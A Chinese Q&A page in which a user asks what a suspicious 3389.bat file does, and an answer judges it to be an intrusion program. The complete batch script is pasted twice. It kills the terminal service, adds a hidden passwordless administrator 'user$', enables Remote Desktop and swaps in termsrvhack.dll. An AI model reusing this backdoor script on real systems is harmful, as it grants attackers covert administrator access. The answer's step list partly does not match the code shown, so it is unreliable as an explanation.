UC知道bat 文件 病毒(高手进)
来源:百度知道 编辑:UC知道 时间:2024/06/06 16:42:56
c盘下有个3389.bat文件,代码如下:
高手解释下啊
aio -terminal 223
Tasklist/SVC|find "TermService">>c:\1.txt
c:\p.exe
for /f "tokens=2 delims= " %%i in (c:\1.txt) do set pid=%%i
@ntsd -c q -p %pid%
@net user user$ "" /add
@net localgroup administrators user$ /add
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
高手解释下啊
aio -terminal 223
Tasklist/SVC|find "TermService">>c:\1.txt
c:\p.exe
for /f "tokens=2 delims= " %%i in (c:\1.txt) do set pid=%%i
@ntsd -c q -p %pid%
@net user user$ "" /add
@net localgroup administrators user$ /add
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
C盘建立名1文本文档并写入记录.
建立隐藏高级用户名user.
注册允许登陆与服务启动项和termsrvhack.dll 文件.
保护隐藏文件termsrvhack.dll
关机
删除c:\termsrvhack.dll
删除c:\1.txt
停止sharedaccess
开始dcomlaunch和termservice文件
删除原文件c:\aio.exe
运行c:\a.bat
整个过程看了会心跳!
加入了一个管理员帐户,修改了termService,又加入了一个temrmrvhack.dll作为服务启动,八成是个入侵程序吧